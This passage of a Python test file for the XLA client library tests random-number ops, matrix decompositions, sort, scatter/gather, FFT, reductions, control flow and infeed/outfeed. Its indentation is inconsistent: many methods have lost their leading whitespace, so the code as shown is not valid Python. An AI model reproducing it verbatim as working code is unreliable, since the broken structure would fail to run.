        shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.F32,
                                           shape))
    result = xla_client.execute_with_python_values(
        self.backend.compile(c.build()), (), backend=self.backend)
    # since the result is random, we just check shape and uniqueness
    self.assertLen(result, 1)
    self.assertEqual(result[0].shape, shape)
    self.assertLen(np.unique(result[0]), np.prod(shape))
  def testRngUniformF32(self):
    """RngUniform(float) stays within [lo, hi) and fills the whole shape."""
    lo, hi = 2., 4.
    shape = (2, 3)
    c = self._NewComputation()
    ops.RngUniform(
        ops.Constant(c, NumpyArrayF32(lo)),
        ops.Constant(c, NumpyArrayF32(hi)),
        shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.F32,
                                           shape))
    result = xla_client.execute_with_python_values(
        self.backend.compile(c.build()), (), backend=self.backend)
    # since the result is random, we just check shape, uniqueness, and range
    self.assertLen(result, 1)
    self.assertEqual(result[0].shape, shape)
    self.assertLen(np.unique(result[0]), np.prod(shape))
    self.assertTrue(np.all(lo <= result[0]))
    self.assertTrue(np.all(result[0] < hi))
  def testRngUniformS32(self):
    """RngUniform(int32) yields int32 values within [lo, hi)."""
    lo, hi = 2, 4
    shape = (2, 3)
    c = self._NewComputation()
    ops.RngUniform(
        ops.Constant(c, NumpyArrayS32(lo)),
        ops.Constant(c, NumpyArrayS32(hi)),
        shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.S32,
                                           shape))
    result = xla_client.execute_with_python_values(
        self.backend.compile(c.build()), (), backend=self.backend)
    # since the result is random, we just check shape, integrality, and range
    self.assertLen(result, 1)
    self.assertEqual(result[0].shape, shape)
    self.assertEqual(result[0].dtype, np.int32)
    self.assertTrue(np.all(lo <= result[0]))
    self.assertTrue(np.all(result[0] < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
ops.Cholesky(ops.Constant(c, np.tril(np.dot(l, l.T))))
self._ExecuteAndCompareClose(c, expected=[l], rtol=1e-4)
def testSort(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
c = self._NewComputation()
ops.Sort(c, [ops.Constant(c, keys)], is_stable=True)
self._ExecuteAndCompareClose(
c,
expected=[np.array([[1, 2, 3, 4], [1, 2, 3, 4]], dtype=np.float32)])
def testSortKeyVal(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
ops.Sort(c, (ops.Constant(c, keys), ops.Constant(c, values)), dimension=0)
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_allclose(result[0], [[2, 1, 1, 2], [3, 4, 4, 3]])
np.testing.assert_equal(result[1], [[0, 5, 2, 7], [4, 1, 6, 3]])
  def testSortCustomComparator(self):
    """Sort with a comparator: keys ascending, ties broken by values descending."""
    b = self._NewComputation("comparator")
    p0 = ops.Parameter(b, 0, xla_client.shape_from_pyval(NumpyArrayF32(0)))
    q0 = ops.Parameter(b, 1, xla_client.shape_from_pyval(NumpyArrayF32(0)))
    p1 = ops.Parameter(b, 2, xla_client.shape_from_pyval(NumpyArrayS32(0)))
    q1 = ops.Parameter(b, 3, xla_client.shape_from_pyval(NumpyArrayS32(0)))
    # True iff (key0 < key1) or (keys equal and value0 > value1).
    ops.Or(ops.Lt(p0, q0), ops.And(ops.Eq(p0, q0), ops.Gt(p1, q1)))
    comparator = b.build()
    keys = np.array([[2, 3, 1, 3], [3, 1, 2, 2]], dtype=np.float32)
    values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
    c = self._NewComputation()
    ops.Sort(
        c, (ops.Constant(c, keys), ops.Constant(c, values)),
        dimension=1,
        comparator=comparator)
    result = xla_client.execute_with_python_values(
        self.backend.compile(c.build()), (), backend=self.backend)
    self.assertLen(result, 2)
    np.testing.assert_allclose(result[0], [[1, 2, 3, 3], [1, 2, 2, 3]])
    np.testing.assert_equal(result[1], [[2, 0, 3, 1], [5, 7, 6, 4]])
def testQR(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
ops.Tuple(c, ops.QR(ops.Constant(c, a), full_matrices=True))
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testEigh(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
a = (a + a.T) / 2
c = self._NewComputation()
ops.Tuple(c, ops.Eigh(ops.Constant(c, a), lower=True))
# TODO(b/129396575): Turn this test back on when it passes without
# fastmath.
# v, w = self._Execute(c, ())
# self.assertLess(np.linalg.norm(np.dot(a, v) - w * v), 1e-3)
def testSVD(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
ops.Tuple(c, ops.SVD(ops.Constant(c, a)))
u, d, v = self._Execute(c, ())
self.assertLess(np.linalg.norm(a - np.matmul(u * d, v.T)), 1e-3)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
ops.TriangularSolve(
ops.Constant(c, a_vals),
ops.Constant(c, b_vals),
left_side=False,
lower=True,
transpose_a=ops.TriangularSolveOptions_Transpose.TRANSPOSE,
unit_diagonal=False)
self._ExecuteAndCompareClose(
c,
expected=[
np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
],
dtype=np.float32)
],
rtol=1e-4)
  def testApproxTopK(self):
    """ApproxTopK reaches the requested recall vs exact TopK (TPU only)."""
    if self.backend.platform != "tpu":
      self.skipTest("ApproxTopK is only supported on TPU")
    k = 10
    qy_size = 256
    db_size = 3000
    feature = 128
    recall_target = 0.95
    # Comparator (f32, f32, s32, s32) -> bool; only the score pair is compared.
    b = self._NewComputation()
    p0 = ops.Parameter(b, 0, xla_client.shape_from_pyval(NumpyArrayF32(0)))
    q0 = ops.Parameter(b, 1, xla_client.shape_from_pyval(NumpyArrayF32(0)))
    ops.Parameter(b, 2, xla_client.shape_from_pyval(NumpyArrayS32(0)))
    ops.Parameter(b, 3, xla_client.shape_from_pyval(NumpyArrayS32(0)))
    ops.Gt(p0, q0)
    comparator = b.build()
    qy_shape = [qy_size, feature]
    db_shape = [feature, db_size]
    rng = np.random.RandomState(0)
    qy_arg = rng.randn(*qy_shape).astype(np.float32)
    db_arg = rng.randn(*db_shape).astype(np.float32)
    # Main computation: exact TopK and ApproxTopK over the same scores.
    b = self._NewComputation()
    qy = ops.Parameter(b, 0, xla_client.shape_from_pyval(qy_arg))
    db = ops.Parameter(b, 1, xla_client.shape_from_pyval(db_arg))
    scores = ops.Dot(qy, db)
    iota = ops.Iota(
        b,
        xla_client.Shape.array_shape(xla_client.PrimitiveType.S32,
                                     (qy_size, db_size)), 1)
    init_val = ops.Constant(b, np.float32(-1))
    init_arg = ops.Constant(b, np.int32(-1))
    ground_truth = ops.TopK(scores, k=k)
    approx_topk = ops.ApproxTopK(
        b, [scores, iota], [init_val, init_arg],
        top_k=k,
        reduction_dim=1,
        comparator=comparator,
        recall_target=recall_target)
    ops.Tuple(b, [
        ops.GetTupleElement(ground_truth, 1),
        ops.GetTupleElement(approx_topk, 1)
    ])
    results = self._Execute(b, [qy_arg, db_arg])
    # Count approximate doc ids appearing in the exact top-k sets per query.
    ground_truth_docids = [set(x) for x in results[0]]
    hits = sum(
        len(list(x for x in approx_topk_per_q
                 if x in ground_truth_docids[q]))
        for q, approx_topk_per_q in enumerate(results[1]))
    self.assertGreater(hits / (qy_size * k), recall_target)
def testIsConstant(self):
c = self._NewComputation()
a = ops.Constant(c, np.int32(3))
b = ops.Constant(c, np.int32(1))
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayS32(0)))
const_expr = ops.Sub(b, a)
non_const_expr = ops.Mul(const_expr, x)
self.assertTrue(c.is_constant(const_expr))
self.assertFalse(c.is_constant(non_const_expr))
def testGather(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
indices = np.array([[[0, 2], [2, 1]], [[1, 2], [2, 0]]], dtype=np.int32)
dnums = xla_client.GatherDimensionNumbers()
dnums.offset_dims.append(1)
dnums.offset_dims.append(2)
dnums.start_index_map.append(0)
dnums.start_index_map.append(1)
dnums.index_vector_dim = 2
c = self._NewComputation()
ops.Gather(
ops.Constant(c, a),
ops.Constant(c, indices),
dnums,
slice_sizes=[1, 1])
g, = self._Execute(c, ())
expected = np.array([[[[2, 7]]], [[[5, 6]]]], dtype=np.int32)
np.testing.assert_allclose(g, expected, rtol=1e-4)
  def testFft(self):
    """FFT/IFFT/RFFT/IRFFT over the last three axes match numpy.fft."""
    if self.backend.platform == "tpu":
      self.skipTest("TPU only supports 1D FFT")
    shape = [2, 3, 4, 5]
    rng = np.random.RandomState(0)
    a = rng.randn(*shape) + 1.0j * rng.randn(*shape)
    a = a.astype(np.complex64)
    # FFT
    c = self._NewComputation()
    ops.Fft(ops.Constant(c, a), xla_client.FftType.FFT, shape[-3:])
    self._ExecuteAndCompareClose(
        c, expected=[np.fft.fftn(a, axes=(1, 2, 3))], rtol=1e-4)
    # IFFT
    c = self._NewComputation()
    ops.Fft(ops.Constant(c, a), xla_client.FftType.IFFT, shape[-3:])
    self._ExecuteAndCompareClose(
        c, expected=[np.fft.ifftn(a, axes=(1, 2, 3))], rtol=1e-4)
    # RFFT
    b = rng.randn(*shape).astype(np.float32)
    c = self._NewComputation()
    ops.Fft(ops.Constant(c, b), xla_client.FftType.RFFT, shape[-3:])
    self._ExecuteAndCompareClose(
        c, expected=[np.fft.rfftn(b, axes=(1, 2, 3))], rtol=1e-4)
    # IRFFT
    c = self._NewComputation()
    ops.Fft(ops.Constant(c, a), xla_client.FftType.IRFFT, [3, 4, 8])
    self._ExecuteAndCompareClose(
        c, expected=[np.fft.irfftn(a, axes=(1, 2, 3))], rtol=1e-4)
def testNextAfter(self):
c = self._NewComputation()
ops.NextAfter(
ops.Constant(c, np.array([1, 2], dtype=np.float32)),
ops.Constant(c, np.array([2, 1], dtype=np.float32)))
out, = self._Execute(c, ())
eps = np.finfo(np.float32).eps
np.testing.assert_equal(
np.array([eps + 1, 2 - eps], dtype=np.float32), out)
  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testRegularizedIncompleteBeta(self, dtype):
    """RegularizedIncompleteBeta I_x(a, b) against precomputed values."""
    x = np.array([0.53787335, 0.24015466, 0.47494545, 0.13567594, 0.95114538],
                 dtype=dtype)
    a = np.array([0.00753073, 0.34813385, 0.30485708, 1.29298632, 0.51472606],
                 dtype=dtype)
    b = np.array([0.55688389, 0.59794214, 0.42661022, 1.59748339, 0.95047677],
                 dtype=dtype)
    c = self._NewComputation()
    ops.RegularizedIncompleteBeta(
        ops.Constant(c, a), ops.Constant(c, b), ops.Constant(c, x))
    expected = np.array(
        [0.98923271, 0.48575411, 0.57952568, 0.12579775, 0.96989155])
    self._ExecuteAndCompareClose(c, expected=[expected], rtol=2e-2)
# Register SingleOpTest with the backend-parameterized test harness.
tests.append(SingleOpTest)
class EmbeddedComputationsTest(ComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantComputation(self, in_dtype, out_dtype):
"""Computation (A) -> B that returns a constant 1 for any input."""
c = self._NewComputation("constant_{}_{}_one".format(
in_dtype.__name__, out_dtype.__name__))
ops.Parameter(
c, 0,
xla_client.shape_from_pyval(np.array(
0, dtype=in_dtype)).with_major_to_minor_layout_if_absent())
ops.Constant(c, out_dtype(1))
return c.build()
def _CreateMulBy2Computation(self, dtype):
"""Computation (dtype) -> dtype that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
ops.Mul(
ops.Parameter(
c, 0,
xla_client.shape_from_pyval(np.array(
0, dtype=dtype)).with_major_to_minor_layout_if_absent()),
ops.Constant(c, dtype(2.0)))
return c.build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
ops.Mul(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0))),
ops.Parameter(c, 1, xla_client.shape_from_pyval(NumpyArrayF32(0))))
return c.build()
def _CreateBinaryAddComputation(self, dtype):
"""Computation (dtype, dtype) -> dtype that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
shape = shape.with_major_to_minor_layout_if_absent()
ops.Add(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
def _CreateBinaryGeComputation(self, dtype):
"""Computation (dtype, dtype) -> bool that tests param0 >= param1."""
c = self._NewComputation("param0_lt_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
shape = shape.with_major_to_minor_layout_if_absent()
ops.Ge(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
def _MakeSample3DArray(self, dtype):
return np.array([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]],
dtype=dtype)
  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testCall(self, dtype):
    """Call invokes the mul-by-2 subcomputation: 5.0 -> 10.0."""
    c = self._NewComputation()
    ops.Call(
        c,
        self._CreateMulBy2Computation(dtype),
        operands=(ops.Constant(c, dtype(5.0)),))
    self._ExecuteAndCompareClose(c, expected=[10.0])
  @parameterized.named_parameters({
      "testcase_name": "_{}_{}".format(in_dtype.__name__, out_dtype.__name__),
      "in_dtype": in_dtype,
      "out_dtype": out_dtype,
  } for in_dtype, out_dtype in [[np.float32, np.int32]])
  def testMapEachElementToConstant(self, in_dtype, out_dtype):
    """Map with a constant-producing subcomputation yields all ones."""
    c = self._NewComputation()
    ops.Map(c,
            [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=in_dtype))],
            self._CreateConstantComputation(in_dtype, out_dtype), [0])
    self._ExecuteAndCompareExact(c, expected=[[1, 1, 1, 1]])
  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testMapMulBy2(self, dtype):
    """Map applies the mul-by-2 subcomputation to each element."""
    if dtype == np.float64 and self.backend.platform == "tpu":
      self.skipTest("TPU doesn't support float64")
    c = self._NewComputation()
    ops.Map(c, [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))],
            self._CreateMulBy2Computation(dtype), [0])
    self._ExecuteAndCompareClose(c, expected=[[2.0, 4.0, 6.0, 8.0]])
  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testSimpleMapChain(self, dtype):
    """Chained Maps: constant-one map followed by mul-by-2 gives all twos."""
    if dtype == np.float64 and self.backend.platform == "tpu":
      self.skipTest("TPU doesn't support float64")
    # Chains a map of constant-out with a map of mul-by-2
    c = self._NewComputation()
    const = ops.Map(
        c, [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))],
        self._CreateConstantComputation(dtype, dtype), [0])
    ops.Map(c, [const], self._CreateMulBy2Computation(dtype), [0])
    self._ExecuteAndCompareClose(c, expected=[[2.0, 2.0, 2.0, 2.0]])
  # TODO(b/154752816): bfloat16 crashes in evaluator.
  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes if dtype != bfloat16)
  def testDivVectorsWithMap(self, dtype):
    """Map with a binary Div subcomputation over two vectors."""
    def DivComputation():
      # Local computation (dtype, dtype) -> dtype dividing param0 by param1.
      c = self._NewComputation("div_param0_by_param1")
      shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
      ops.Div(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
      return c.build()
    c = self._NewComputation()
    ops.Map(c, (ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype)),
                ops.Constant(c, np.array([5.0, 5.0, 4.0, 4.0], dtype=dtype))),
            DivComputation(), [0])
    self._ExecuteAndCompareClose(
        c, expected=[[0.2, 0.4, 0.75, 1.0]], rtol=1e-3)
  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testSelectAndScatter(self, dtype):
    """SelectAndScatter adds sources at the window maxima (Ge select)."""
    if dtype == np.float64 and self.backend.platform == "tpu":
      self.skipTest("TPU doesn't support float64")
    c = self._NewComputation()
    operand = ops.Constant(
        c, np.array([[1., 2., 6.], [4., 5., 3.]], dtype=dtype))
    window_dimensions = (2, 1)
    window_strides = (1, 2)
    # VALID padding computed explicitly from the operand dimensions.
    padding = xla_client.window_padding_type_to_pad_values(
        xla_client.PaddingType.VALID,
        c.get_shape(operand).dimensions(), window_dimensions, window_strides)
    ops.SelectAndScatterWithGeneralPadding(
        operand,
        select=self._CreateBinaryGeComputation(dtype),
        window_dimensions=window_dimensions,
        window_strides=window_strides,
        padding=padding,
        source=ops.Constant(c, np.array([[0.1, 0.2]], dtype=dtype)),
        init_value=ops.Constant(c, np.array(1, dtype=dtype)),
        scatter=self._CreateBinaryAddComputation(dtype))
    self._ExecuteAndCompareClose(
        c, expected=[[[1., 1., 1.2], [1.1, 1., 1.]]], rtol=5e-3)
@parameterized.named_parameters({
    "testcase_name": "_{}".format(dtype.__name__),
    "dtype": dtype,
} for dtype in float_dtypes)
def testReduce1DtoScalar(self, dtype):
  """Sum-reduces a 1D constant vector to a scalar (1+2+3+4 == 10)."""
  c = self._NewComputation()
  ops.Reduce(
      c,
      operands=[
          ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))
      ],
      init_values=[ops.Constant(c, dtype(0))],
      computation=self._CreateBinaryAddComputation(dtype),
      dimensions_to_reduce=[0])
  self._ExecuteAndCompareClose(c, expected=[10])
# TODO(phawkins): test comparison harness doesn't support bfloat16
@parameterized.named_parameters({
    "testcase_name": "_{}_dim{}".format(dtype.__name__, dim),
    "dtype": dtype,
    "dim": dim,
} for dtype in float_dtypes if dtype != bfloat16 for dim in range(2))
def testReduce2DTo1D(self, dtype, dim):
  """Sum-reduces a 2D array over each axis; checked against np.sum."""
  input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
  c = self._NewComputation()
  ops.Reduce(
      c,
      operands=[ops.Constant(c, input_array)],
      init_values=[ops.Constant(c, dtype(0))],
      computation=self._CreateBinaryAddComputation(dtype),
      dimensions_to_reduce=[dim])
  self._ExecuteAndCompareClose(c, expected=[np.sum(input_array, axis=dim)])
@parameterized.named_parameters({
    "testcase_name": "_{}_dims[{}]".format(dtype.__name__, dims),
    "dtype": dtype,
    "dims": tuple(dims)
} for dtype in float_dtypes for dims in itertools.permutations(range(3)))
def testReduce3DAllPossibleWaysF32(self, dtype, dims):
  """Sum-reduces a 3D array over every permutation of its three axes."""
  input_array = self._MakeSample3DArray(dtype)
  c = self._NewComputation()
  ops.Reduce(
      c,
      operands=[ops.Constant(c, input_array)],
      init_values=[ops.Constant(c, dtype(0))],
      computation=self._CreateBinaryAddComputation(dtype),
      dimensions_to_reduce=dims)
  self._ExecuteAndCompareClose(c, expected=[np.sum(input_array, axis=dims)])
@parameterized.named_parameters({
    "testcase_name": "_{}".format(dtype.__name__),
    "dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowValidUnitStrides(self, dtype):
  """ReduceWindow(sum) with a 2x1 window, unit strides, VALID padding."""
  if dtype == np.float64 and self.backend.platform == "tpu":
    self.skipTest("TPU doesn't support float64")
  input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
  c = self._NewComputation()
  window_dimensions = (2, 1)
  window_strides = (1, 1)
  # Expand symbolic VALID padding into explicit per-dimension pad values.
  padding = xla_client.window_padding_type_to_pad_values(
      xla_client.PaddingType.VALID, input_array.shape, window_dimensions,
      window_strides)
  ops.ReduceWindowWithGeneralPadding(
      operand=ops.Constant(c, input_array),
      init_value=ops.Constant(c, dtype(0)),
      computation=self._CreateBinaryAddComputation(dtype),
      window_dimensions=window_dimensions,
      window_strides=window_strides,
      base_dilations=[],
      window_dilations=[],
      padding=padding)
  self._ExecuteAndCompareClose(c, expected=[[[5., 7., 9.]]])
@parameterized.named_parameters({
    "testcase_name": "_{}".format(dtype.__name__),
    "dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowSameUnitStrides(self, dtype):
  """ReduceWindow(sum) with a 2x1 window, unit strides, SAME padding."""
  if dtype == np.float64 and self.backend.platform == "tpu":
    self.skipTest("TPU doesn't support float64")
  input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
  c = self._NewComputation()
  window_dimensions = (2, 1)
  window_strides = (1, 1)
  # SAME padding keeps the output the same shape as the input.
  padding = xla_client.window_padding_type_to_pad_values(
      xla_client.PaddingType.SAME, input_array.shape, window_dimensions,
      window_strides)
  ops.ReduceWindowWithGeneralPadding(
      operand=ops.Constant(c, input_array),
      init_value=ops.Constant(c, dtype(0)),
      computation=self._CreateBinaryAddComputation(dtype),
      window_dimensions=window_dimensions,
      window_strides=window_strides,
      base_dilations=[],
      window_dilations=[],
      padding=padding)
  self._ExecuteAndCompareClose(c, expected=[[[5., 7., 9.], [4., 5., 6.]]])
@parameterized.named_parameters({
    "testcase_name": "_{}".format(dtype.__name__),
    "dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowValidGeneralStrides(self, dtype):
  """ReduceWindow(sum) with a 2x1 window and stride 2 on the minor dim."""
  if dtype == np.float64 and self.backend.platform == "tpu":
    self.skipTest("TPU doesn't support float64")
  input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
  c = self._NewComputation()
  window_dimensions = (2, 1)
  window_strides = (1, 2)
  padding = xla_client.window_padding_type_to_pad_values(
      xla_client.PaddingType.VALID, input_array.shape, window_dimensions,
      window_strides)
  ops.ReduceWindowWithGeneralPadding(
      operand=ops.Constant(c, input_array),
      init_value=ops.Constant(c, dtype(0)),
      computation=self._CreateBinaryAddComputation(dtype),
      window_dimensions=window_dimensions,
      window_strides=window_strides,
      base_dilations=[],
      window_dilations=[],
      padding=padding)
  self._ExecuteAndCompareClose(c, expected=[[[5., 9.]]])
def testReduceWindowVariadic(self):
  """Variadic ReduceWindow over a (key, value) pair of arrays.

  The reducer keeps whichever (key, value) pair has the larger key, so the
  result is a windowed "argmax by key" over both operands simultaneously.
  """
  c = self._NewComputation("reducer")
  shape = xla_client.shape_from_pyval(np.array(0, dtype=np.int32))
  shape = shape.with_major_to_minor_layout_if_absent()
  # Reducer takes (key0, val0, key1, val1) and selects by key comparison.
  ps = [ops.Parameter(c, i, shape) for i in range(4)]
  which = ops.Ge(ps[0], ps[2])
  ops.Tuple(
      c, [ops.Select(which, ps[0], ps[2]),
          ops.Select(which, ps[1], ps[3])])
  reducer = c.build()

  key_array = np.array([[1, 5, 6], [4, 2, 3]], dtype=np.int32)
  val_array = np.array([[7, 8, 9], [10, 11, 12]], dtype=np.int32)
  c = self._NewComputation()
  window_dimensions = (2, 1)
  window_strides = (1, 1)
  padding = xla_client.window_padding_type_to_pad_values(
      xla_client.PaddingType.VALID, key_array.shape, window_dimensions,
      window_strides)
  ops.ReduceWindowWithGeneralPadding(
      operands=[ops.Constant(c, key_array),
                ops.Constant(c, val_array)],
      init_values=[
          ops.Constant(c, np.int32(0)),
          ops.Constant(c, np.int32(0))
      ],
      computation=reducer,
      window_dimensions=window_dimensions,
      window_strides=window_strides,
      base_dilations=[],
      window_dilations=[],
      padding=padding)
  self._ExecuteAndCompareClose(c, expected=[[[4, 5, 6]], [[10, 8, 9]]])
@parameterized.named_parameters({
    "testcase_name": "_{}".format(dtype.__name__),
    "dtype": dtype,
} for dtype in float_dtypes)
def testWhile(self, dtype):
  """While loop doubling 1.0 until >= 10: 1 -> 2 -> 4 -> 8 -> 16."""

  def LessThan10Cond():
    # Loop condition: scalar parameter < 10.
    c = self._NewComputation("test_lt_10")
    shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
    ops.Lt(ops.Parameter(c, 0, shape), ops.Constant(c, dtype(10.)))
    return c.build()

  cond = LessThan10Cond()
  body = self._CreateMulBy2Computation(dtype)
  c = self._NewComputation()
  init = ops.Constant(c, dtype(1.))
  ops.While(cond, body, init)
  self._ExecuteAndCompareClose(c, expected=[16.])
def testConditionalTrue(self):
  """Conditional with a true predicate runs the true branch (3 * 2 == 6)."""
  c = self._NewComputation()
  pred = ops.Constant(c, np.bool_(True))
  true_operand = ops.Constant(c, np.float32(3.))
  true_computation = self._CreateMulBy2Computation(np.float32)
  false_operand = ops.Constant(c, np.float32(2.))
  false_computation = self._CreateConstantComputation(
      np.float32, np.float32)
  ops.Conditional(pred, true_operand, true_computation, false_operand,
                  false_computation)
  self._ExecuteAndCompareClose(c, expected=[6.])
def testConditionalFalse(self):
  """Conditional with a false predicate runs the false branch.

  The false branch is the constant computation, which (per its use elsewhere
  in this suite) ignores its operand and returns 1 — hence expected [1.].
  """
  c = self._NewComputation()
  pred = ops.Constant(c, np.bool_(False))
  true_operand = ops.Constant(c, np.float32(3.))
  true_computation = self._CreateMulBy2Computation(np.float32)
  false_operand = ops.Constant(c, np.float32(2.))
  false_computation = self._CreateConstantComputation(
      np.float32, np.float32)
  ops.Conditional(pred, true_operand, true_computation, false_operand,
                  false_computation)
  self._ExecuteAndCompareClose(c, expected=[1.])
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedS32Values(self):
  """Feeds scalars through the infeed queue and reads them back in order."""
  to_infeed = NumpyArrayS32([1, 2, 3, 4])
  c = self._NewComputation()
  # The computation returns element 0 of the (value, token) infeed tuple.
  ops.GetTupleElement(
      ops.InfeedWithToken(
          ops.CreateToken(c),
          xla_client.shape_from_pyval(
              to_infeed[0]).with_major_to_minor_layout_if_absent()), 0)
  compiled_c = self.backend.compile(c.build())
  device = self.backend.local_devices()[0]

  # Enqueue all items first, then execute once per item; the infeed queue
  # must preserve ordering.
  for item in to_infeed:
    device.transfer_to_infeed(item)

  for item in to_infeed:
    result, = xla_client.execute_with_python_values(
        compiled_c, (), backend=self.backend)
    self.assertEqual(result, item)
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedTuple(self):
  """Feeds a tuple of two arrays through infeed and checks both elements."""
  to_infeed = (NumpyArrayS32([1, 2, 3, 4]), NumpyArrayS32([[7], [8]]))
  c = self._NewComputation()
  # Element 0 of the (value, token) infeed result is the tuple itself.
  ops.GetTupleElement(
      ops.InfeedWithToken(
          ops.CreateToken(c),
          xla_client.shape_from_pyval(
              to_infeed).with_major_to_minor_layout_if_absent()), 0)
  compiled_c = self.backend.compile(c.build())
  device = self.backend.local_devices()[0]
  device.transfer_to_infeed(to_infeed)

  result = xla_client.execute_with_python_values(
      compiled_c, (), backend=self.backend)
  self.assertLen(result, 2)
  np.testing.assert_equal(result[0], to_infeed[0])
  np.testing.assert_equal(result[1], to_infeed[1])
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedThenOutfeedS32(self):
  """Round-trips scalars: infeed into the computation, outfeed back out.

  Each execution blocks on infeed/outfeed, so it is run on a helper thread
  while the main thread performs the host-side transfers.
  """
  to_round_trip = NumpyArrayS32([1, 2, 3, 4])
  c = self._NewComputation()
  x_and_token = ops.InfeedWithToken(
      ops.CreateToken(c),
      xla_client.shape_from_pyval(
          to_round_trip[0]).with_major_to_minor_layout_if_absent())
  x = ops.GetTupleElement(x_and_token, 0)
  token = ops.GetTupleElement(x_and_token, 1)
  outfeed_shape = xla_client.shape_from_pyval(
      to_round_trip[0]).with_major_to_minor_layout_if_absent()
  ops.OutfeedWithToken(x, token, outfeed_shape)
  compiled_c = self.backend.compile(c.build())
  device = self.backend.local_devices()[0]

  for want in to_round_trip:
    execution = threading.Thread(target=lambda: compiled_c.execute([]))
    execution.start()
    device.transfer_to_infeed(want)
    got = device.transfer_from_outfeed(outfeed_shape)
    execution.join()
    self.assertEqual(want, got)
def testScatter(self):
  """Scatter-adds row updates into rows 0 and 2 of a 3x3 operand."""
  a = np.arange(9).astype(np.int32).reshape((3, 3))
  scatter_indices = np.array([0, 2], dtype=np.int32)
  updates = np.array([[10, 20, 30], [70, 80, 90]], dtype=np.int32)

  # Each index selects a whole row (window dim 1); rows are combined with add.
  dnums = xla_client.ScatterDimensionNumbers()
  dnums.update_window_dims.append(1)
  dnums.inserted_window_dims.append(0)
  dnums.scatter_dims_to_operand_dims.append(0)
  dnums.index_vector_dim = 1

  c = self._NewComputation()
  ops.Scatter(
      ops.Constant(c, a), ops.Constant(c, scatter_indices),
      ops.Constant(c, updates), self._CreateBinaryAddComputation(np.int32),
      dnums)
  expected = np.array([[10, 21, 32], [3, 4, 5], [76, 87, 98]],
                      dtype=np.int32)
  self._ExecuteAndCompareClose(c, expected=[expected])
class DeviceTest(ComputationTest):
